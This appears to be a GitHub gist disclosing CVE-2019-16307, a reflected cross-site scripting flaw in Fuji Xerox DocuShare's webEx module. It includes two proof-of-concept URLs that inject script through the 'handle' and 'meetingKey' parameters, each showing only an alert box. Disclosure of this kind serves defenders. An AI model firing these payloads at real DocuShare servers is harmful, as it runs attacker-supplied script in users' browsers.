Skip to content

Instantly share code, notes, and snippets.

@izadgot
Created September 14, 2019 16:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save izadgot/3efc75f62f9c9567c8f11bad74165425 to your computer and use it in GitHub Desktop.
Save izadgot/3efc75f62f9c9567c8f11bad74165425 to your computer and use it in GitHub Desktop.
PoC A Reflected Cross-Site Scripting (XSS) vulnerability in the webEx module in webExMeetingLogin.jsp and deleteWebExMeetingCheck.jsp in Fuji Xerox DocuShare through 7.0.0.C1.609 (CVE-2019-16307)
[Product Description]
Xerox DocuShare is enterprise content management (ECM) designed with usability, flexibility and convenience in mind. It helps knowledge workers be more efficient every day by focusing on the intersection of people, paper and processes – the lifeblood of today’s work environment. (Information from Humanica homepage)
[Details]
A Reflected Cross-Site Scripting (XSS) vulnerability in the webEx module in webExMeetingLogin.jsp and deleteWebExMeetingCheck.jsp in Fuji Xerox DocuShare through 7.0.0.C1.609 allows remote attackers to inject arbitrary web script or HTML via the "handle" parameter (webExMeetingLogin.jsp) and "meetingKey" parameter (deleteWebExMeetingCheck.jsp).
[Impact]
Running malicious web script or HTML script on victim's web browser.
[Affected component]
Fuji Xerox DocuShare through 7.0.0.C1.609 webEx module
[Attack Type]
Remote
[PoC]
1. webExMeetingLogin.jsp (insert javascript into "handle" parameter)
https://[target host]/[DocuShare path]/dsweb/webex/webExMeetingLogin.jsp?handle=asdasd%22;}}%3C/script%3E%3Cscript%3Ealert(`incognito%20lab`)%3C/script%3E
2. deleteWebExMeetingCheck.jsp (insert javascript into "meetingKey" parameter)
https://[target host]/[DocuShare path]/dsweb/webex/deleteWebExMeetingCheck.jsp?meetingKey=000001%22;}%3Cscript%3Ealert(%22Incognito%20Lab%22)%3C/script%3E;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment